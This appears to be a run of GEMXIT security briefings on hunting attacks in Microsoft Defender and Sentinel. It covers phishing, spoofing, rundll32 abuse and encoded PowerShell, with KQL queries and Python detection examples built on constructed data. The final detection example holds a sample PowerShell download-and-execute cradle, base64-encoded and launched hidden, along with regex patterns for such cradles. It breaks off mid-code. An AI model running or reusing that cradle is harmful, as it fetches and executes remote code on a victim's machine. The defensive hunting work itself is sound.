GEMXIT PTY LTD

Develop IT.. Solve IT.. GEMXIT

04/06/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The timeline told the story…”
“…because the logs already knew.”

👉 Sign in at 08:12
👉 Privilege escalation at 08:24
👉 Data access at 08:27
👉 Lateral movement at 08:31

☕ Individually, each event looked normal.
Together, they revealed the entire attack path.

🔍 What we found:

• Successful sign-in activity
• Privilege changes shortly afterwards
• Sensitive data access
• Follow-on device and network activity
• Events spread across multiple Microsoft security tables

Nothing screamed "incident."
In fact, the dashboard was greener than a frog in a lettuce factory.

But together... the timeline changed everything.

🧠 So we didn't trust one alert. We built the timeline.
Even simple investigation pivots can expose the story:

IdentityLogonEvents
| where Timestamp > ago(24h)
| project Timestamp, AccountUpn, IPAddress, DeviceName, ActionType
| order by Timestamp asc
// IdentityLogonEvents holds Defender for Identity and Defender for Cloud Apps logons;
// Entra ID sign-ins sit in AADSignInEventsBeta (Sentinel: SigninLogs), so pivot there too

👉 Sometimes the evidence isn't missing.
It's simply scattered across different tables, devices and timestamps.
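Building that timeline means stacking rows from several tables into one per-account sequence and asking whether the stages land in order, close together. The following is an added Python example (not GEMXIT's code or query) that does this over a handful of constructed rows normalised from IdentityLogonEvents, IdentityDirectoryEvents, CloudAppEvents and DeviceNetworkEvents; which ActionType counts as which stage, and the 30-minute window, are assumptions to tune per tenant.

```python
from datetime import datetime, timedelta

# (Table, ActionType) pairs mapped to the four stages of the path described
# above.  Table and ActionType values are Defender XDR advanced-hunting names;
# which ones count as "privilege", "data" or "lateral" is this example's
# assumption and should be tuned to the tenant.
STAGES = {
    ("IdentityLogonEvents", "LogonSuccess"): "signin",
    ("IdentityDirectoryEvents", "Group Membership changed"): "privilege",
    ("CloudAppEvents", "FileDownloaded"): "data",
    ("DeviceNetworkEvents", "ConnectionSuccess"): "lateral",
}
ORDER = ["signin", "privilege", "data", "lateral"]

# Constructed sample rows, not real telemetry.  Each row has already been
# normalised to a common AccountUpn column (DeviceNetworkEvents carries it as
# InitiatingProcessAccountUpn), which is the first thing a union query does.
SAMPLE_EVENTS = [
    {"Table": "IdentityLogonEvents", "Timestamp": "2026-06-04T08:12:00Z",
     "AccountUpn": "j.smith@example.test", "ActionType": "LogonSuccess", "Detail": "203.0.113.7"},
    {"Table": "IdentityDirectoryEvents", "Timestamp": "2026-06-04T08:24:00Z",
     "AccountUpn": "j.smith@example.test", "ActionType": "Group Membership changed", "Detail": "Domain Admins"},
    {"Table": "CloudAppEvents", "Timestamp": "2026-06-04T08:27:00Z",
     "AccountUpn": "j.smith@example.test", "ActionType": "FileDownloaded", "Detail": "payroll-2026.xlsx"},
    {"Table": "DeviceNetworkEvents", "Timestamp": "2026-06-04T08:31:00Z",
     "AccountUpn": "j.smith@example.test", "ActionType": "ConnectionSuccess", "Detail": "10.0.0.25:445"},
    # ordinary activity from another user: a sign-in, then a download 35 minutes later
    {"Table": "IdentityLogonEvents", "Timestamp": "2026-06-04T08:05:00Z",
     "AccountUpn": "a.lee@example.test", "ActionType": "LogonSuccess", "Detail": "10.0.0.9"},
    {"Table": "CloudAppEvents", "Timestamp": "2026-06-04T08:40:00Z",
     "AccountUpn": "a.lee@example.test", "ActionType": "FileDownloaded", "Detail": "agenda.docx"},
]


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def build_timeline(events):
    """Group stage-relevant events by account, each account sorted by time."""
    timeline = {}
    for event in events:
        stage = STAGES.get((event["Table"], event["ActionType"]))
        if stage is None:
            continue
        timeline.setdefault(event["AccountUpn"], []).append(
            (parse_ts(event["Timestamp"]), stage, event))
    for rows in timeline.values():
        rows.sort(key=lambda row: row[0])
    return timeline


def find_attack_paths(events, window=timedelta(minutes=30)):
    """Return one record per account whose timeline contains all four stages,
    in order, within `window` of the sign-in that starts the path."""
    paths = []
    for account, rows in build_timeline(events).items():
        for i, (start, stage, _) in enumerate(rows):
            if stage != "signin":
                continue
            seen = {"signin": start}
            want = 1                        # index of the next stage we need
            for when, later_stage, _ in rows[i + 1:]:
                if when - start > window:   # rows are sorted, nothing later fits
                    break
                if later_stage == ORDER[want]:
                    seen[later_stage] = when
                    want += 1
                    if want == len(ORDER):
                        break
            if want == len(ORDER):
                path = {"AccountUpn": account}
                path.update({s: t.strftime("%H:%M") for s, t in seen.items()})
                paths.append(path)
                break                       # one confirmed path per account
    return paths


if __name__ == "__main__":
    for path in find_attack_paths(SAMPLE_EVENTS):
        print(path)
```

In KQL the same shape is a union of the four tables projected to a common AccountUpn column and sorted by Timestamp; writing the ordering rule and the window down in code first makes both explicit before they are baked into a detection.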

💥 What this kind of activity can indicate:
• Account compromise
• Privilege escalation
• Suspicious data access
• Lateral movement
• Post-authentication attacker activity
• Hidden relationships between seemingly unrelated events

No single event told the full story.
The timeline did.

🔐 The takeaway:

"The event looked normal..."
"...until the next event explained it."

👉 Modern investigations are not just about alerts.
They are about connecting behaviour across time.

🧭 Built on:

Microsoft Defender XDR | Microsoft Sentinel | Microsoft Entra ID | KQL

🕵️‍♂️ Agent Foskett's note:

The sign-in looked normal.
The data access looked normal.
The lateral movement looked normal.
The timeline didn't.

And that's why attackers hate timestamps.

Develop IT.. Protect IT.. GEMXIT

GEMXIT PTY LTD | GEMXIT UK LTD

29/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“Rundll32 Looked Legitimate”
👉 Signed Microsoft binary
👉 Running from System32
👉 No malware alert
👉 No user complaint

☕ Everything looked normal.
The dashboards were green.
The coffee was hot.
The SOC was quiet.

Which is usually when Agent Foskett gets suspicious. 😅

The process was:
rundll32.exe

A completely legitimate Windows component.
Trusted.
Common.
Expected.

And that’s exactly why attackers love it.
Because most people see:

“Oh… that’s just Windows doing Windows things.”

But in Microsoft Defender XDR, the behaviour told a different story.

🔍 What we found:
• Unusual command-line arguments
• DLL execution from temp folders
• Suspicious parent process chain
• Unexpected outbound connections
• Trusted process… suspicious behaviour

No high-severity alert triggered.
Because technically… the binary was legitimate.
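What "unusual command-line arguments" and "suspicious parent process chain" look like once written down as checks: an added Python example (not GEMXIT's code) that parses the DLL argument out of a rundll32 command line, scores it against user-writable paths, non-DLL extensions, the javascript: handler, ordinal exports and an unexpected parent, then joins DeviceNetworkEvents by device and process id to find external connections. The rows are constructed and the list of expected parents is an assumption to baseline per estate.

```python
import re

# Constructed DeviceProcessEvents / DeviceNetworkEvents-style rows (not real
# telemetry); column names follow Defender XDR advanced hunting.
SAMPLE_PROCESSES = [
    {"DeviceName": "WS-0142", "ProcessId": 4412, "FileName": "rundll32.exe",
     "ProcessCommandLine": 'rundll32.exe "C:\\Users\\bob\\AppData\\Local\\Temp\\upd.dat",Start',
     "InitiatingProcessFileName": "WINWORD.EXE"},
    {"DeviceName": "WS-0142", "ProcessId": 3120, "FileName": "rundll32.exe",
     "ProcessCommandLine": '"C:\\Windows\\System32\\rundll32.exe" C:\\Windows\\System32\\shell32.dll,Control_RunDLL desk.cpl',
     "InitiatingProcessFileName": "explorer.exe"},
]
SAMPLE_NETWORK = [
    {"DeviceName": "WS-0142", "InitiatingProcessId": 4412, "RemoteIP": "203.0.113.45", "RemotePort": 443},
    {"DeviceName": "WS-0142", "InitiatingProcessId": 3120, "RemoteIP": "10.0.0.5", "RemotePort": 445},
]

USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
# Parents that normally spawn rundll32 (assumption: baseline this per estate).
EXPECTED_PARENTS = {"explorer.exe", "svchost.exe", "services.exe", "msiexec.exe", "control.exe", "userinit.exe"}


def dll_argument(cmdline):
    """Return (dll, entry_point) from a rundll32 command line.  The first
    argument may be quoted (path with spaces) or bare; the entry point follows
    the comma, e.g. shell32.dll,Control_RunDLL."""
    m = re.match(r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s*(.*)$', cmdline, re.IGNORECASE)
    rest = m.group(1) if m else ""
    if not rest:
        return "", ""
    if rest.startswith('"'):
        close = rest.find('"', 1)
        path = rest[1:close] if close > 0 else rest[1:]
        tail = rest[close + 1:] if close > 0 else ""
        first = path + (tail.split()[0] if tail and not tail[0].isspace() else "")
    else:
        first = rest.split()[0]
    dll, _, entry = first.partition(",")
    return dll, entry


def is_internal(ip):
    """RFC 1918 / loopback check done by hand so documentation ranges count as external."""
    octets = ip.split(".")
    if len(octets) != 4 or not all(o.isdigit() for o in octets):
        return False
    a, b = int(octets[0]), int(octets[1])
    return a in (10, 127) or (a == 192 and b == 168) or (a == 172 and 16 <= b <= 31)


def assess_rundll32(proc, net_events):
    """Reasons this rundll32 instance deserves a look; an empty list means nothing odd."""
    reasons = []
    dll, entry = dll_argument(proc["ProcessCommandLine"])
    low = dll.lower()
    if any(marker in low for marker in USER_WRITABLE):
        reasons.append(f"DLL loaded from user-writable path: {dll}")
    if low.startswith("javascript:"):
        reasons.append("javascript: protocol handler abuse")
    elif low and not low.endswith((".dll", ".cpl")):
        reasons.append(f"DLL argument has a non-DLL extension: {dll}")
    if entry.startswith("#"):
        reasons.append(f"export called by ordinal: {entry}")
    parent = proc["InitiatingProcessFileName"].lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent process: {parent}")
    external = sorted({n["RemoteIP"] for n in net_events
                       if n["DeviceName"] == proc["DeviceName"]
                       and n["InitiatingProcessId"] == proc["ProcessId"]
                       and not is_internal(n["RemoteIP"])})
    if external:
        reasons.append("outbound connection to " + ", ".join(external))
    return reasons


def hunt_rundll32(processes, net_events):
    """Every rundll32 process with at least one reason, as (device, pid, reasons)."""
    findings = []
    for proc in processes:
        if proc["FileName"].lower() != "rundll32.exe":
            continue
        reasons = assess_rundll32(proc, net_events)
        if reasons:
            findings.append((proc["DeviceName"], proc["ProcessId"], reasons))
    return findings


if __name__ == "__main__":
    for finding in hunt_rundll32(SAMPLE_PROCESSES, SAMPLE_NETWORK):
        print(finding)
```

The control-panel launch from explorer.exe scores nothing; the .dat file from Temp, spawned by Word and talking to an external address, collects four reasons. Counting reasons rather than alerting on any single one is what keeps the benign Windows noise out.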

🧠 This is the shift in modern threat hunting:

It’s no longer:
❌ Did malware execute?

It’s now:
✅ What was the trusted process actually doing?

That’s why behavioural analysis matters across:
• Microsoft Defender XDR
• Advanced Hunting
• DeviceProcessEvents
• DeviceNetworkEvents
• KQL investigations

Attackers rely on trust:
• PowerShell looks normal
• Logins appear legitimate
• MFA succeeds
• Dashboards stay green
• And rundll32 quietly blends in

Meanwhile, Agent Foskett at 11:47 PM:
☕🕵️‍♂️
"Yeah… you’re not fooling me."

🛡️ Takeaway:
The filename is only the beginning of the story.
Behaviour is where the truth lives.

New Agent Foskett investigation:
👉 “Rundll32 Looked Legitimate”


21/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The Disney email looked real…”

“…but Disney never sent it.”

👉 Correct branding

👉 Professional layout

👉 Trusted subscription theme

👉 Urgent “update your information” request

☕ Everything looked legitimate… until we checked the sender.

MembershipCenterD+

Not Disney.

Not a Disney-owned domain.

Not even remotely related.

🔍 What we found:

• Fake Disney subscription renewal email

• Highly convincing branding and formatting

• Suspicious sender domain (academic domain, not Disney)

• SendGrid tracking links used for delivery

• External redirect chains via third-party infrastructure

• Urgency tactics designed to trigger immediate action

At first glance, nothing looked malicious.

Because technically… it wasn’t obvious.

💥 This wasn’t sloppy phishing. This was deliberate trust engineering.

🧠 So we didn’t trust the logo - we investigated the identity.

Because identity signals don’t lie - even when branding does.

Even simple Microsoft Defender pivots can expose suspicious sender behaviour:

EmailEvents
| where Subject has "Disney" or Subject has "subscription"
| project Timestamp, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, AuthenticationDetails, DeliveryAction
// a From domain that differs from the MailFrom domain is the alignment gap to chase

👉 The branding looked trusted.

👉 The infrastructure didn’t.

💥 What this kind of activity can indicate:

• Brand impersonation phishing

• Redirect-chain abuse

• Sender mismatch attacks

• DMARC/SPF alignment failures

• Social engineering campaigns

• Credential harvesting attempts

No malware required.

🔐 The takeaway:

“The email looked legitimate…”

“…but the trust relationship wasn’t.”

👉 Modern phishing no longer looks suspicious

👉 It blends in perfectly

👉 And waits for users to trust before they verify

🧭 Built on:

Microsoft Defender XDR | Microsoft Sentinel | Microsoft Entra ID

🧩 Quick check:

Would this email pass your first glance test?

Or would you check the sender before the click?

🕵️‍♂️ Agent Foskett’s note:

The logo earned trust.

The sender didn’t deserve it.


16/05/2026

🚨 Agent Foskett Briefing // Certification Renewed

Microsoft Certified: Security Operations Analyst Associate

Renewed successfully through November 2027. ✅

Turns out spending unhealthy amounts of time staring at KQL queries, EmailEvents, SigninLogs, and suspicious PowerShell activity has finally paid off again. 😂

But the real value of security operations was never the certification itself.

It’s learning how to interpret the signals that most organisations overlook.

The strange sign-in nobody investigated.

The DMARC failure that still got delivered.

The “low severity” alert that definitely wasn’t low severity.

The PowerShell event hidden inside 400,000 normal log entries.

The after-hours SharePoint download that looked harmless… until it wasn’t.

Over the years, I’ve spent countless hours working across:

• Microsoft Defender XDR

• Microsoft Sentinel

• Entra ID

• KQL investigations

• Identity and email security analysis

Somewhere along the way, Agent Foskett accidentally became a real thing too… which still sounds ridiculous when I say it out loud. 😂

That experience is exactly why I continue building the Agent Foskett cyber briefings through GEMXIT.

Because modern security isn’t just about having dashboards.

It’s about understanding what the data is trying to tell you.

And occasionally keeping your threat hunting skills sharper than a hedgehog on espresso. 🦔☕🔥


15/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing
“The file was downloaded…”
“…at 2:14AM.”
👉 No malware.
👉 No alert.
👉 Just… a file leaving the environment.
☕ Everything looked normal — until it didn’t.
________________________________________
🔍 What we found:
• Legitimate user account
• SharePoint file download
• Activity outside business hours
• No historical pattern of after-hours access
No alerts triggered.
Because technically… nothing was “malicious.”
________________________________________
🧠 So we didn’t trust alerts, we hunted behaviour.
Even a simple query can expose this (SharePoint download audit lands in Sentinel’s OfficeActivity table; AuditLogs holds Entra ID directory changes and would return nothing here):
OfficeActivity
| where OfficeWorkload == "SharePoint" and Operation == "FileDownloaded"
// TimeGenerated is UTC; judge "after hours" in the business timezone (adjust to your tenant)
| extend LocalTime = datetime_utc_to_local(TimeGenerated, "Australia/Melbourne")
| extend Hour = datetime_part("hour", LocalTime)
| where Hour < 6 or Hour >= 20
| project TimeGenerated, LocalTime, UserId, ClientIP, SourceFileName
👉 That’s often all it takes to find something that shouldn’t exist.
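The query finds after-hours downloads; "no historical pattern" needs a baseline as well. Added Python example (not GEMXIT's code) over constructed OfficeActivity-style rows: convert the UTC TimeGenerated to local time, keep SharePoint FileDownloaded rows outside 06:00 to 20:00, and flag only users who have an after-hours download in the last day and none in the previous 30. The fixed AEST offset is an assumption; the night-shift user in the sample shows why the baseline matters.

```python
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumption: business hours are judged in the tenant's local zone.  A fixed
# AEST offset keeps this runnable offline; use zoneinfo.ZoneInfo("Australia/Melbourne")
# in production so daylight saving is handled.
LOCAL_TZ = timezone(timedelta(hours=10), "AEST")
NOW = datetime(2026, 5, 15, 6, 0, tzinfo=timezone.utc)

# Constructed OfficeActivity-style rows, not real telemetry.  TimeGenerated is UTC.
SAMPLE_ACTIVITY = [
    # j.smith: a business-hours download earlier in the month, then one at 02:14 local
    {"TimeGenerated": "2026-05-01T03:00:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "j.smith@example.test", "ClientIP": "10.0.0.12", "SourceFileName": "roadmap.pptx"},
    {"TimeGenerated": "2026-05-14T16:14:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "j.smith@example.test", "ClientIP": "203.0.113.7", "SourceFileName": "Q3-forecast.xlsx"},
    # n.chen: night shift, after-hours downloads are routine for this account
    {"TimeGenerated": "2026-05-05T15:30:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "n.chen@example.test", "ClientIP": "10.0.0.40", "SourceFileName": "shift-log.xlsx"},
    {"TimeGenerated": "2026-05-10T16:00:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "n.chen@example.test", "ClientIP": "10.0.0.40", "SourceFileName": "shift-log.xlsx"},
    {"TimeGenerated": "2026-05-14T17:00:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "n.chen@example.test", "ClientIP": "10.0.0.40", "SourceFileName": "shift-log.xlsx"},
    # a.lee: 23:30 UTC is 09:30 local, not after hours
    {"TimeGenerated": "2026-05-14T23:30:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileDownloaded",
     "UserId": "a.lee@example.test", "ClientIP": "10.0.0.9", "SourceFileName": "agenda.docx"},
    # not a download, ignored
    {"TimeGenerated": "2026-05-14T16:30:00Z", "OfficeWorkload": "SharePoint", "Operation": "FileAccessed",
     "UserId": "j.smith@example.test", "ClientIP": "203.0.113.7", "SourceFileName": "Q3-forecast.xlsx"},
]


def parse_utc(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def is_after_hours(when_utc, start_hour=6, end_hour=20):
    """True when the local-time hour falls outside [start_hour, end_hour)."""
    hour = when_utc.astimezone(LOCAL_TZ).hour
    return hour < start_hour or hour >= end_hour


def first_time_after_hours(rows, now=NOW, recent=timedelta(days=1), baseline=timedelta(days=30)):
    """Users with after-hours SharePoint downloads in the recent window and
    none in the rest of the baseline window."""
    recent_hits = defaultdict(list)
    baseline_hits = defaultdict(int)
    for row in rows:
        if row["OfficeWorkload"] != "SharePoint" or row["Operation"] != "FileDownloaded":
            continue
        when = parse_utc(row["TimeGenerated"])
        age = now - when
        if age < timedelta(0) or age > baseline or not is_after_hours(when):
            continue
        if age <= recent:
            local = when.astimezone(LOCAL_TZ).strftime("%Y-%m-%d %H:%M")
            recent_hits[row["UserId"]].append((local, row["SourceFileName"], row["ClientIP"]))
        else:
            baseline_hits[row["UserId"]] += 1
    return [{"UserId": user, "Downloads": hits}
            for user, hits in sorted(recent_hits.items()) if baseline_hits[user] == 0]


if __name__ == "__main__":
    for finding in first_time_after_hours(SAMPLE_ACTIVITY):
        print(finding)
```

The night-shift account has a recent 03:00 download too, but two earlier ones in the baseline keep it off the list; only the account with no prior after-hours history is surfaced, which is the "no historical pattern" point above.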
________________________________________
💥 What this kind of activity can indicate:
• Insider data exfiltration
• Compromised accounts
• Token/session misuse
• Users preparing to leave
No malware required.
________________________________________
🔐 The takeaway:
“The download wasn’t blocked…”
“…because nothing about it looked dangerous.”
👉 Modern attacks don’t always break in.
Sometimes… they just take data out.
________________________________________
🧭 Built on:
Microsoft Sentinel | Microsoft Defender for Cloud Apps | Microsoft 365 Purview
________________________________________
🕵️‍♂️ Agent Foskett’s note:
The logs already knew.
We just had to ask the right question.


07/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“Apparently, GEMXIT just won $7,146,325.16…”

“…from a crypto reward system we never joined.”

☕ Righto then.

This email had everything attackers love:

👉 A massive dollar amount

👉 Urgency

👉 Crypto rewards

👉 Wallet connection instructions

👉 “Proceed anyway”

👉 WhatsApp support

👉 Fake confidentiality wording

👉 And my own email address is included to make it feel personal

But here’s the real lesson:

This wasn’t clever because it looked professional.

It was clever because it tried to make the victim act before thinking.

The attacker didn’t ask for a password.

They asked for something better:

👉 Connect a crypto wallet

👉 Approve access

👉 Enter a “payment code”

👉 Follow instructions outside normal business systems

That’s how modern scams work.

They don’t always break in.

Sometimes they simply convince you to open the door.

🔍 What we would look for in Microsoft Defender

EmailEvents
| where Subject has_any ("PENDING PAYMENT", "UNCLAIMED REWARDS", "Airdrop")
| project Timestamp, SenderFromAddress, SenderFromDomain, RecipientEmailAddress, Subject, DeliveryAction, ThreatTypes

Then pivot into URLs:

EmailUrlInfo
| where Url has_any ("wallet", "claim", "airdrop", "crypto", "whatsapp")
| project Timestamp, NetworkMessageId, Url
// NetworkMessageId joins each URL back to its EmailEvents row (sender, recipient, delivery action)

🧠 Agent Foskett’s rule

If an email says:

“Proceed anyway”

That’s usually your sign to do the exact opposite.

Security isn’t just about blocking malware.

It’s teaching people to recognise when the story doesn’t make sense.


01/05/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The email looked legitimate…”
“…but it was never from us.”

👉 That’s when things stop making sense.
The sender felt familiar
The message made sense
Nothing triggered suspicion
☕ Just another normal email…
until we looked at the data.
________________________________________
🔍 What’s really happening
This isn’t always a breach.
👉 It’s spoofing
Attackers don’t need access
They don’t need credentials
👉 They just need trust
Even with MFA in place…
👉 If a message is trusted, the damage is already done
________________________________________
🧠 Agent Foskett’s mindset
Don’t ask:
❌ “Did something fail?”
Ask:
👉 What did this message pretend to be?
👉 Who trusted it?
👉 Should it have been trusted at all?
________________________________________
💻 How we prove it
We don’t guess… we investigate.
Using Microsoft Defender:
• EmailEvents
• AuthenticationDetails
• Sender alignment
👉 We build the full authentication story
________________________________________
💥 What that reveals
• Emails that look internal… but aren’t
• Messages delivered despite failed checks
• Campaigns hiding in plain sight
👉 No alerts. Just behaviour.
________________________________________
⚠️ The reality
Most environments don’t get hacked first…
👉 They get trusted first
________________________________________
🚀 Takeaway
If your security relies on:
👉 “It looked fine”
You’ve already lost.
👉 Would you have trusted this email?
________________________________________

23/04/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing

“The email came from me…”

“…but I never sent it.”

👉 That’s when you know something’s off.

No breach.

No login alert.

No suspicious sign-ins.

☕ Just a normal day…

until you email yourself.

🔍 What actually happened?

An email landed in the inbox:

• ✅ From: my own address

• ✅ Looked legitimate (DocuSign notification)

• ❌ “View Document” button masked a malicious link

• ❌ Redirect chain to an unrelated external domain

No compromise.

No mailbox access.

💡Just spoofing.

💥 The trick attackers use

They don’t always hack accounts.

Sometimes…

they just pretend to be you.

📨 SMTP doesn’t verify identity by default.

So attackers can forge:

• Your domain

• Your email address

• Your identity

👉 And send it to you…

or worse… your clients.

🧠 Why this works

Because it breaks your instinct:

“If it came from me… it must be safe.”

That moment of hesitation?

That’s the gap attackers exploit.

🛠️ What we checked (before panicking)

We didn’t assume breach.

We verified:

• ❌ No unusual sign-ins in Microsoft Entra ID

• ❌ No mailbox rules or forwarding

• ❌ No suspicious activity in Microsoft Defender

👉 So we shifted mindset:

Not compromise…

Impersonation.

🔐 The controls that actually matter

This is where most environments fall short.

✅ SPF

Lists which servers may send mail using your domain as the envelope MAIL FROM

✅ DKIM

Cryptographically signs your emails so the receiver can check they came from your domain’s signing key and were not altered

🚨 DMARC (the critical control)

Requires an SPF or DKIM pass that aligns with the visible From: domain, and tells receivers what to do when it’s fake: p=none, p=quarantine or p=reject

Without DMARC enforcement (p=none, or no record at all):

👉 Spoofed emails still get delivered

👉 Even when SPF and DKIM fail
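How those three checks combine, and why p=none changes nothing for delivery: an added Python example (not GEMXIT's code) that models DMARC evaluation over two constructed EmailEvents-style records. One is the Disney-branded mail from the earlier briefing (authentication passes, but the brand and the From domain do not match, and From and MailFrom are not aligned); the other is a direct spoof of our own domain. AuthenticationDetails follows the JSON verdict shape Defender XDR reports; the SpfDomain and DkimDomain fields are this example's own additions (Defender's column does not carry the domain each check authenticated, the message's Authentication-Results header does), and the organisational-domain and brand allow-list logic are simplifications labelled in the code.

```python
import json

# Constructed EmailEvents-style records, not real telemetry.  AuthenticationDetails
# uses the verdict keys Defender XDR reports; SpfDomain/DkimDomain are added here
# because Defender's column does not carry the domain each check authenticated.
SAMPLE_EMAILS = [
    {   # brand impersonation: Disney theme, From an unrelated academic domain, sent via a bulk relay
        "Subject": "Your Disney+ subscription could not be renewed",
        "SenderDisplayName": "MembershipCenterD+",
        "SenderFromAddress": "alerts@uni-example.edu",
        "SenderMailFromAddress": "bounces+42@mail-relay.example.net",
        "AuthenticationDetails": '{"SPF":"pass","DKIM":"pass","DMARC":"pass","CompAuth":"pass"}',
        "SpfDomain": "mail-relay.example.net",
        "DkimDomain": "uni-example.edu",
    },
    {   # direct spoof of our own domain: envelope and SPF belong to the attacker, no DKIM
        "Subject": "Document ready for signature",
        "SenderDisplayName": "Agent Foskett",
        "SenderFromAddress": "agent.foskett@gemxit.example",
        "SenderMailFromAddress": "bounce@attacker.example",
        "AuthenticationDetails": '{"SPF":"pass","DKIM":"none","DMARC":"fail","CompAuth":"fail"}',
        "SpfDomain": "attacker.example",
        "DkimDomain": "",
    },
]


def domain_of(address):
    return address.rsplit("@", 1)[-1].lower()


def org_domain(domain):
    """Organisational domain, approximated as the last two labels.  Real DMARC
    evaluators use the Public Suffix List (example.co.uk keeps three labels);
    the simplification is deliberate here."""
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def aligned(from_domain, auth_domain, mode="relaxed"):
    """DMARC identifier alignment between the visible From domain and the
    domain that SPF or DKIM actually authenticated."""
    if not auth_domain:
        return False
    if mode == "strict":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def dmarc_result(msg):
    """DMARC passes only if SPF or DKIM passed AND that result aligns with From."""
    auth = json.loads(msg["AuthenticationDetails"])
    from_domain = domain_of(msg["SenderFromAddress"])
    spf_ok = auth.get("SPF") == "pass" and aligned(from_domain, msg["SpfDomain"])
    dkim_ok = auth.get("DKIM") == "pass" and aligned(from_domain, msg["DkimDomain"])
    return "pass" if (spf_ok or dkim_ok) else "fail"


def disposition(msg, policy):
    """What a receiver does with the message given the From domain's published
    p= tag.  p=none is monitoring only: a failing spoof is still delivered."""
    if dmarc_result(msg) == "pass":
        return "deliver"
    return {"none": "deliver", "quarantine": "quarantine", "reject": "reject"}[policy]


# Assumed allow-list of domains a brand legitimately mails from; build yours from
# verified senders, this placeholder is illustrative only.
BRAND_DOMAINS = {"disney": {"disney.example"}}


def brand_mismatch(msg):
    """Brands named in the subject or display name whose From domain is not one of theirs."""
    text = (msg["Subject"] + " " + msg["SenderDisplayName"]).lower()
    sender_org = org_domain(domain_of(msg["SenderFromAddress"]))
    return [brand for brand, domains in BRAND_DOMAINS.items()
            if brand in text and sender_org not in {org_domain(d) for d in domains}]


def triage(msg, policy="none"):
    from_domain = domain_of(msg["SenderFromAddress"])
    return {
        "dmarc": dmarc_result(msg),
        "disposition": disposition(msg, policy),
        "mailfrom_aligned": aligned(from_domain, domain_of(msg["SenderMailFromAddress"])),
        "brand_mismatch": brand_mismatch(msg),
    }


if __name__ == "__main__":
    for msg in SAMPLE_EMAILS:
        print(msg["SenderFromAddress"], triage(msg, "none"), "| with p=reject:", disposition(msg, "reject"))
```

Two different lessons fall out of the same code: the Disney mail is fully authenticated, so DMARC cannot help and only the brand-versus-domain check catches it; the spoof of our own domain fails DMARC outright, yet still reaches the inbox unless the published policy is quarantine or reject.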

💡 The reality

Attackers don’t always break in.

Sometimes… they just:

• Borrow your name

• Forge your identity

• Wait for someone to trust it

🧪 The real test

Ask yourself:

👉 If an email came from your own domain…

👉 Would your environment trust it?

Or block it?

🕵️‍♂️ Agent Foskett Insight

“The email looked legitimate…

because identity wasn’t being verified.”

👉 Security isn’t just detection anymore.

It’s trust enforcement.

🔒 Final thought

If DMARC isn’t set to reject…

👉 You don’t control your identity.

Attackers do.


16/04/2026

🕵️‍♂️ Agent Foskett’s Friday Cyber Briefing
“Low confidence.”
“Informational.”
“No automated action.”

👉 Probably nothing… right?
That’s exactly how real incidents begin.
No panic.
No ticket.
No escalation.
☕ Just another signal in Microsoft Defender XDR.
________________________________________
🔍 But something didn’t sit right.
A single alert:
• Suspicious PowerShell execution
• Encoded command (-enc)
• User context (not system)
• No remediation triggered
Most teams would:
✅ Acknowledge
✅ Close
✅ Move on
________________________________________
💡 This is what attackers rely on
They don’t always bypass your tools.
Sometimes… they just need you to ignore them.
________________________________________
🧠 So we hunted the behaviour - not the alert.
👉 What actually ran?
👉 Who ran it?
👉 How was it executed?
Result:
• Encoded PowerShell
• Obfuscated command
• Executed on a user workstation
Still… “informational.”
________________________________________
🧠 Next pivot: Did it talk out?
We found:
• Outbound traffic from PowerShell
• Same device
• Same user context
Now it’s not just execution…
👉 It’s execution + communication
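"What actually ran" and "did it talk out", as an added Python example (not GEMXIT's code): pull the -enc payload off a DeviceProcessEvents command line (powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus the -ec alias), decode it as UTF-16LE, pattern-match the script for cradle and obfuscation indicators, extract its URLs, and check them against DeviceNetworkEvents rows from the same process. The process and network rows are constructed, the script is a generic download cradle pointed at a documentation address, and the indicator list is a starting point, not a complete one.

```python
import base64
import re

# Every unambiguous prefix of -EncodedCommand is accepted by powershell.exe,
# plus the documented -ec alias.
ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}

# Constructed sample: a download cradle wrapped in -enc, the way the alert in
# the post would have seen it.  The host is a documentation (TEST-NET-3) address.
SAMPLE_SCRIPT = "$c=New-Object Net.WebClient;IEX $c.DownloadString('http://203.0.113.45/a.ps1')"
SAMPLE_PROCESS = {
    "DeviceName": "WS-0142", "ProcessId": 5120, "AccountName": "bob", "FileName": "powershell.exe",
    "ProcessCommandLine": "powershell.exe -NoP -W Hidden -enc "
        + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii"),
}
SAMPLE_NETWORK = [
    {"DeviceName": "WS-0142", "InitiatingProcessId": 5120, "InitiatingProcessFileName": "powershell.exe",
     "RemoteIP": "203.0.113.45", "RemotePort": 80, "RemoteUrl": "203.0.113.45"},
]

INDICATORS = {
    "download-cradle": re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "invoke-expression": re.compile(r"Invoke-Expression|\biex\b", re.I),
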